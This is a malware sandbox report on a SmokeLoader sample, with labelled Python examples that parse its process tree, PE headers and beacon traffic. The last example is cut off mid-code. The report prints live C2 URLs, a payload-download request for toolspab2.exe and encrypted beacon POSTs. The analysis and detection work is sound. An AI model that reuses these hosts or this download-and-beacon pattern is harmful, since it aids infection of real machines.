Windows Analysis Report qhQ6armJ25.exe

Overview

General Information

Sample Name: qhQ6armJ25.exe
Analysis ID: 528745
MD5: 9953acb0fee6c45fc5aa12d21ac3ad1b
SHA1: afaf20c658c307f53e804639710c2dce09e9c3ba
SHA256: 5231916fbeb9c166a9bbb4e7c576b210019a3a84c17cbe777cb099ab3aad5dd8
Tags: Dofoil, exe, SmokeLoader

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Contains functionality to inject code into remote processes
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • qhQ6armJ25.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\qhQ6armJ25.exe" MD5: 9953ACB0FEE6C45FC5AA12D21AC3AD1B)
    • qhQ6armJ25.exe (PID: 7144 cmdline: "C:\Users\user\Desktop\qhQ6armJ25.exe" MD5: 9953ACB0FEE6C45FC5AA12D21AC3AD1B)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • D380.exe (PID: 6328 cmdline: C:\Users\user\AppData\Local\Temp\D380.exe MD5: 61BA8F1EDCD03481D6447E8EC34DC383)
          • D380.exe (PID: 5456 cmdline: C:\Users\user\AppData\Local\Temp\D380.exe MD5: 61BA8F1EDCD03481D6447E8EC34DC383)
  • gahfeaj (PID: 5032 cmdline: C:\Users\user\AppData\Roaming\gahfeaj MD5: 9953ACB0FEE6C45FC5AA12D21AC3AD1B)
    • gahfeaj (PID: 6344 cmdline: C:\Users\user\AppData\Roaming\gahfeaj MD5: 9953ACB0FEE6C45FC5AA12D21AC3AD1B)
  • cleanup
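The process tree above, run through a small parent/child checker, as an added example that is not part of the Joe Sandbox report. From the tree alone it re-derives several of the listed signatures: a process image with no PE extension (gahfeaj), execution from user-writable AppData paths, explorer.exe launching a file dropped into %TEMP%, each binary re-spawning an identical copy of itself (the pattern behind the suspended-process and injection signatures), and explorer.exe sitting underneath a user-launched binary. The tree text is copied from the report; the rule names, the path list and the set of system images are this example's own assumptions.

```python
import re

# Process tree as printed in the report above (the "cleanup" marker omitted).
PROCESS_TREE = r"""
  • System is w10x64
  • qhQ6armJ25.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\qhQ6armJ25.exe" MD5: 9953ACB0FEE6C45FC5AA12D21AC3AD1B)
    • qhQ6armJ25.exe (PID: 7144 cmdline: "C:\Users\user\Desktop\qhQ6armJ25.exe" MD5: 9953ACB0FEE6C45FC5AA12D21AC3AD1B)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • D380.exe (PID: 6328 cmdline: C:\Users\user\AppData\Local\Temp\D380.exe MD5: 61BA8F1EDCD03481D6447E8EC34DC383)
          • D380.exe (PID: 5456 cmdline: C:\Users\user\AppData\Local\Temp\D380.exe MD5: 61BA8F1EDCD03481D6447E8EC34DC383)
  • gahfeaj (PID: 5032 cmdline: C:\Users\user\AppData\Roaming\gahfeaj MD5: 9953ACB0FEE6C45FC5AA12D21AC3AD1B)
    • gahfeaj (PID: 6344 cmdline: C:\Users\user\AppData\Roaming\gahfeaj MD5: 9953ACB0FEE6C45FC5AA12D21AC3AD1B)
"""

NODE_RE = re.compile(
    r"^(?P<indent>\s*)•\s+(?P<name>\S+)\s+\(PID:\s*(?P<pid>\d+)\s+cmdline:\s*"
    r"(?P<cmdline>.*?)\s+MD5:\s*(?P<md5>[0-9A-Fa-f]{32})\)\s*$"
)

# Locations a normal user can write to (this example's list, not the report's).
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\",
                 "\\users\\public\\", "\\programdata\\")
# Images that the OS starts itself and that should not appear under a user binary.
SYSTEM_IMAGES = {"explorer.exe", "svchost.exe", "winlogon.exe",
                 "userinit.exe", "services.exe", "lsass.exe"}


def image_from_cmdline(cmdline: str) -> str:
    """First token of a command line, honouring a quoted image path."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        return cmdline[1:cmdline.index('"', 1)]
    return cmdline.split()[0]


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def parse_tree(text: str) -> dict:
    """Turn the indented bullet tree into {pid: {name, image, md5, parent}}."""
    procs, stack = {}, []           # stack holds (indent, pid) of open ancestors
    for line in text.splitlines():
        m = NODE_RE.match(line)
        if not m:                   # e.g. the "System is w10x64" line
            continue
        indent, pid = len(m["indent"]), int(m["pid"])
        while stack and stack[-1][0] >= indent:
            stack.pop()
        procs[pid] = {
            "name": m["name"],
            "image": image_from_cmdline(m["cmdline"]),
            "md5": m["md5"].upper(),
            "parent": stack[-1][1] if stack else None,
        }
        stack.append((indent, pid))
    return procs


def analyze(text: str):
    """Return (procs, findings); each finding is (pid, rule_id, detail)."""
    procs = parse_tree(text)
    findings = []
    for pid, p in procs.items():
        img = p["image"].lower()
        parent = procs.get(p["parent"])
        in_user_dir = any(d in img for d in USER_WRITABLE)
        if not basename(img).endswith((".exe", ".com", ".scr")):
            findings.append((pid, "no_pe_extension", p["image"]))
        if in_user_dir:
            findings.append((pid, "user_writable_path", p["image"]))
        if parent is None:
            continue
        parent_is_system = basename(parent["image"]) in SYSTEM_IMAGES
        if parent_is_system and in_user_dir:
            findings.append((pid, "system_parent_launches_dropped",
                             f"started by {parent['name']} PID {p['parent']}"))
        if parent["md5"] == p["md5"] and parent["image"].lower() == img:
            findings.append((pid, "self_spawn", f"copy of PID {p['parent']}"))
        if basename(img) in SYSTEM_IMAGES and not parent_is_system:
            findings.append((pid, "system_image_under_user_process",
                             f"child of {parent['name']} PID {p['parent']}"))
    return procs, findings


if __name__ == "__main__":
    procs, findings = analyze(PROCESS_TREE)
    for pid, rule, detail in findings:
        print(f"PID {pid:>5} {procs[pid]['name']:<14} {rule:<32} {detail}")
```

The self_spawn rule is what makes the qhQ6armJ25.exe and D380.exe pairs stand out: a binary that re-launches an identical copy of itself has no legitimate reason to do so except to get a fresh, suspended process to write into.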

Malware Configuration

Threatname: SmokeLoader

{"C2 list": ["http://nalirou70.top/", "http://xacokuo80.top/"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000005.00000002.834313384.0000000000460000.00000004.00000001.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000001.00000002.765681019.0000000000640000.00000004.00000001.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000002.00000000.748566688.0000000004F01000.00000020.00020000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000005.00000002.834484758.00000000005A1000.00000004.00020000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000001.00000002.765917923.0000000002051000.00000004.00020000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            AV Detection:

            Found malware configuration
            Source: 00000005.00000002.834313384.0000000000460000.00000004.00000001.sdmp | Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://nalirou70.top/", "http://xacokuo80.top/"]}
            Multi AV Scanner detection for submitted file
            Source: qhQ6armJ25.exe | Virustotal: Detection: 45%
            Antivirus detection for URL or domain
            Source: http://nalirou70.top/ | Avira URL Cloud: Label: phishing
            Source: http://privacytoolzfor-you7000.top/downloads/toolspab2.exe | Avira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URL
            Source: privacytoolzfor-you7000.top | Virustotal: Detection: 6%
            Source: xacokuo80.top | Virustotal: Detection: 7%
            Source: nalirou70.top | Virustotal: Detection: 10%
            Source: http://xacokuo80.top/ | Virustotal: Detection: 7%
            Machine Learning detection for sample
            Source: qhQ6armJ25.exe | Joe Sandbox ML: detected
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Joe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Joe Sandbox ML: detected
            Source: qhQ6armJ25.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: Binary string: xd?#C:\kotofaru\tenexut.pdbP+C source: qhQ6armJ25.exe, gahfeaj.2.dr
            Source: Binary string: C:\loc vetudigalol\6_di.pdbP+C source: D380.exe, 00000004.00000000.800740573.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000004.00000002.820427647.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000006.00000000.817319243.0000000000401000.00000020.00020000.sdmp, D380.exe.2.dr
            Source: Binary string: C:\loc vetudigalol\6_di.pdb source: D380.exe, 00000004.00000000.800740573.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000004.00000002.820427647.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000006.00000000.817319243.0000000000401000.00000020.00020000.sdmp, D380.exe.2.dr
            Source: Binary string: C:\kotofaru\tenexut.pdb source: qhQ6armJ25.exe, gahfeaj.2.dr

            Networking:

            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exe | Domain query: nalirou70.top
            Source: C:\Windows\explorer.exe | Domain query: privacytoolzfor-you7000.top
            Source: C:\Windows\explorer.exe | Domain query: xacokuo80.top
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractor | URLs: http://nalirou70.top/
            Source: Malware configuration extractor | URLs: http://xacokuo80.top/
            Source: Joe Sandbox View | ASN Name: RAPMSB-ASRU RAPMSB-ASRU
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 25 Nov 2021 17:24:50 GMTContent-Type: application/x-msdos-programContent-Length: 302592Connection: closeLast-Modified: Thu, 25 Nov 2021 17:24:01 GMTETag: "49e00-5d1a03d96f132"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b0 b4 92 23 f4 d5 fc 70 f4 d5 fc 70 f4 d5 fc 70 9b a3 57 70 dd d5 fc 70 9b a3 62 70 e5 d5 fc 70 9b a3 56 70 97 d5 fc 70 fd ad 6f 70 ff d5 fc 70 f4 d5 fd 70 03 d5 fc 70 9b a3 53 70 f5 d5 fc 70 9b a3 66 70 f5 d5 fc 70 9b a3 61 70 f5 d5 fc 70 52 69 63 68 f4 d5 fc 70 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2a 7d 9d 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 08 03 00 00 b4 7c 01 00 00 00 00 20 7c 01 00 00 10 00 00 00 20 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 80 01 00 04 00 00 6b 2c 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 fe 02 00 78 00 00 00 00 70 7e 01 f8 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 7e 01 d4 17 00 00 20 14 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 7a 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 cc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 06 03 00 00 10 00 00 00 08 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c0 41 7b 01 00 20 03 00 00 14 00 00 00 0c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 67 00 00 
00 70 7e 01 00 68 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 a8 14 01 00 00 e0 7e 01 00 16 01 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
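The hex dump above is the start of the 302592-byte body served for /downloads/toolspab2.exe. The following added example (mine, not Joe Sandbox code) parses exactly those bytes with a minimal PE32 header reader and recovers what a triage analyst wants before running anything: machine type and file characteristics, the section table with its flags, whether the raw extents in the section table end exactly at the Content-Length the server announced (they do, so the served file was complete rather than truncated), and which section is far larger in memory than on disk, which is where a loader stages unpacked code. Only the header bytes up to the end of the section table are embedded, and the parser assumes a PE32 (32-bit) optional header, which is what the report shows.

```python
import struct

# First 0x278 bytes of the HTTP response body shown above (DOS header, Rich
# header, PE header, optional header and section table of toolspab2.exe),
# copied from the report's hex dump. The remaining payload bytes are omitted.
PE_HEADER = bytes.fromhex(
    "4d5a90000300000004000000ffff0000b8000000000000004000000000000000"
    "00000000000000000000000000000000000000000000000000000000e0000000"
    "0e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f"
    "742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000"
    "b0b49223f4d5fc70f4d5fc70f4d5fc709ba35770ddd5fc709ba36270e5d5fc70"
    "9ba3567097d5fc70fdad6f70ffd5fc70f4d5fd7003d5fc709ba35370f5d5fc70"
    "9ba36670f5d5fc709ba36170f5d5fc7052696368f4d5fc700000000000000000"
    "504500004c0104002a7d9d5f0000000000000000e00002010b010a0000080300"
    "00b47c0100000000207c01000010000000200300000040000010000000020000"
    "0500010000000000050001000000000000008001000400006b2c050002000081"
    "0000100000100000000010000010000000000000100000000000000000000000"
    "d4fe02007800000000707e01f867000000000000000000000000000000000000"
    "00e07e01d4170000201400001c00000000000000000000000000000000000000"
    "0000000000000000487a010040000000000000000000000000100000cc030000"
    "0000000000000000000000000000000000000000000000002e74657874000000"
    "2806030000100000000803000004000000000000000000000000000020000060"
    "2e64617461000000c0417b010020030000140000000c03000000000000000000"
    "00000000400000c02e72737263000000f867000000707e010068000000200300"
    "000000000000000000000000400000402e72656c6f630000a814010000e07e01"
    "001601000088030000000000000000000000000040000042"
)
CONTENT_LENGTH = 302592   # announced by the server in the response above

FILE_FLAGS = {0x0002: "EXECUTABLE_IMAGE", 0x0100: "32BIT_MACHINE", 0x2000: "DLL"}
SECTION_FLAGS = {
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x00000040: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    0x00000080: "IMAGE_SCN_CNT_UNINITIALIZED_DATA",
    0x02000000: "IMAGE_SCN_MEM_DISCARDABLE",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}


def flag_names(value: int, table: dict) -> list:
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe_headers(data: bytes) -> dict:
    """Parse DOS header, COFF header, PE32 optional header and section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsect, stamp, _symtab, _nsyms, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 optional headers are handled here")
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    image_base, sect_align, file_align = struct.unpack_from("<III", data, opt + 28)
    size_of_image, size_of_headers = struct.unpack_from("<II", data, opt + 56)
    n_dirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(n_dirs)]
    sections = []
    for i in range(nsect):                      # section table follows the optional header
        off = opt + opt_size + 40 * i
        name, vsize, va, rawsize, rawptr, _, _, _, _, sflags = struct.unpack_from("<8sIIIIIIHHI", data, off)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": vsize, "virtual_address": va,
                         "raw_size": rawsize, "raw_ptr": rawptr, "characteristics": sflags})
    return {"machine": machine, "number_of_sections": nsect, "timestamp": stamp,
            "characteristics": chars, "entry_point": entry, "image_base": image_base,
            "section_alignment": sect_align, "file_alignment": file_align,
            "size_of_image": size_of_image, "size_of_headers": size_of_headers,
            "data_directories": dirs, "sections": sections}


def expected_file_size(hdr: dict) -> int:
    """Highest raw end offset in the section table (the file size unless data is appended)."""
    return max(s["raw_ptr"] + s["raw_size"] for s in hdr["sections"])


def inflated_sections(hdr: dict, ratio: int = 16) -> list:
    """Sections whose in-memory size dwarfs their on-disk size: room for unpacked code."""
    return [s["name"] for s in hdr["sections"]
            if s["raw_size"] and s["virtual_size"] > ratio * s["raw_size"]]


if __name__ == "__main__":
    h = parse_pe_headers(PE_HEADER)
    print(f"machine=0x{h['machine']:x} flags={flag_names(h['characteristics'], FILE_FLAGS)} "
          f"entry=0x{h['entry_point']:x} size_of_image=0x{h['size_of_image']:x}")
    for s in h["sections"]:
        print(f"{s['name']:<8} va=0x{s['virtual_address']:07x} vsize=0x{s['virtual_size']:07x} "
              f"raw=0x{s['raw_size']:06x}@0x{s['raw_ptr']:05x} {flag_names(s['characteristics'], SECTION_FLAGS)}")
    print("raw sections end at", expected_file_size(h), "/ Content-Length", CONTENT_LENGTH)
    print("inflated sections:", inflated_sections(h))
```

The interesting output is the .data section: 0x1400 bytes on disk but 0x17b41c0 bytes in memory, which is why SizeOfImage is 24 MB for a 300 KB file. A section like that is a strong hint that the real payload is unpacked into it at run time, which matches the Yara hits on memory dumps rather than on the file.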
            Source: global traffic | HTTP traffic detected:
                POST / HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                Accept: */*
                Referer: http://edwxjxx.net/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                Content-Length: 151
                Host: xacokuo80.top
            Source: global traffic | HTTP traffic detected:
                POST / HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                Accept: */*
                Referer: http://kwcurllpj.com/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                Content-Length: 356
                Host: xacokuo80.top
            Source: global traffic | HTTP traffic detected:
                GET /downloads/toolspab2.exe HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                Host: privacytoolzfor-you7000.top
            Source: global traffic | HTTP traffic detected:
                POST / HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                Accept: */*
                Referer: http://tpjfndspxp.com/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                Content-Length: 306
                Host: xacokuo80.top
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tpjfndspxp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: xacokuo80.topData Raw: 10 87 8a 95 6c 84 dc b4 cc 4b 0d 33 7b cf 90 8d 42 13 a8 37 d2 35 1f ed cf 9b db fe 88 a4 e0 84 1f b2 5a a5 1d 1a c5 e0 ec d9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 9e 66 5d 02 c9 a1 c1 64 5d dc cc 36 26 d3 5c 15 b2 01 6a 5c 14 07 e7 84 ce 30 cc b0 ae b5 3d 25 0d 30 1d be 6b 73 be 6e 00 63 62 97 66 e0 b8 67 ab 40 59 0e 6f 97 fc 77 29 7e b2 4f c1 96 77 61 fb e0 26 d2 56 0d 0a f9 29 cc 4f ad b9 ea ab 97 56 d4 22 82 28 2a 6c 5c 55 83 3d f7 b0 64 f9 f8 08 b9 9b 37 1f 15 be e3 e1 99 93 5d 6f b6 f5 80 bc b1 22 6a d9 9e dc f1 00 7c 14 6e 37 a8 b2 45 18 22 b9 f9 9b 25 99 7f 72 52 fc 51 43 bc 8e 1e c0 79 c4 3d c7 b3 36 77 c8 6f ed b0 95 49 97 de 45 26 d5 7a 3a b5 ba f8 c8 3f fc 8e 26 60 d2 7a 96 a4 79 42 fb be 60 a5 42 dc 55 54 0f 49 a2 fa 1d 5c 12 aa a1 3e 00 7b 47 1f 6c d6 d6 23 0d f4 60 fe 70 1a 03 b7 e6 44 69 47 9c 07 29 d9 50 d2 a2 e2 a2 54 8d cb e8 60 d8 2f 0d 66 Data Ascii: lK3{B75Zwmwu$f]d]6&\j\0=%0ksncbfg@Yow)~Owa&V)OV"(*l\U=d7]o"j|n7E"%rRQCy=6woIE&z:?&`zyB`BUTI\>{Gl#`pDiG)PT`/f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 25 Nov 2021 17:24:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f0 1d b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 25 Nov 2021 17:24:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 2f ae 59 4a c3 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOj/YJUg%EQAc}yc0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 25 Nov 2021 17:25:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 78 61 63 6f 6b 75 6f 38 30 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at xacokuo80.top Port 80</address></body></html>0
            Source: unknown | HTTP traffic detected:
                POST / HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                Accept: */*
                Referer: http://edwxjxx.net/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                Content-Length: 151
                Host: xacokuo80.top
            Source: unknown | DNS traffic detected: queries for: nalirou70.top
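The POST beacons above share a shape worth encoding as detection logic: a POST to the bare path "/", a Content-Type that claims a URL-encoded form while the body is raw binary, a Referer on a throwaway domain unrelated to the Host, and an IE11 user agent sent without the Accept-Language and Accept-Encoding headers a real browser adds; the C2 answers "404 Not Found" with a chunked body that is binary rather than HTML. The following is an added example, not part of the report or of any Joe Sandbox tooling, that parses raw HTTP messages and scores those traits. Header values and the 404 chunk are copied from the report; the POST body is cut to its first 16 bytes, the benign login request and its 404 page are invented controls, and the scoring threshold and the missing-header heuristic are this example's own assumptions.

```python
from urllib.parse import urlsplit

# Constructed messages modelled on the report's capture. Header values match
# the report; the POST body is cut to 16 bytes and the benign pair is invented.
BEACON_REQ = (
    b"POST / HTTP/1.1\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Accept: */*\r\n"
    b"Referer: http://tpjfndspxp.com/\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko\r\n"
    b"Content-Length: 16\r\n"
    b"Host: xacokuo80.top\r\n\r\n"
    b"\x10\x87\x8a\x95\x6c\x84\xdc\xb4\xcc\x4b\x0d\x33\x7b\xcf\x90\x8d"
)
# The 404 reply from the report: one chunk of 0x19 bytes that is not HTML.
BEACON_RESP = (
    b"HTTP/1.1 404 Not Found\r\n"
    b"Server: nginx/1.20.1\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Connection: close\r\n\r\n"
    b"19\r\n\x14\x00\x00\x00\x7b\xfa\xf0\x1d\xb5\x69\x2b\x2c\x47\xfa\x0e\xa8"
    b"\xc1\x82\x9f\x4f\x1a\xc4\xda\x16\x00\r\n0\r\n\r\n"
)
BENIGN_REQ = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: example.com\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
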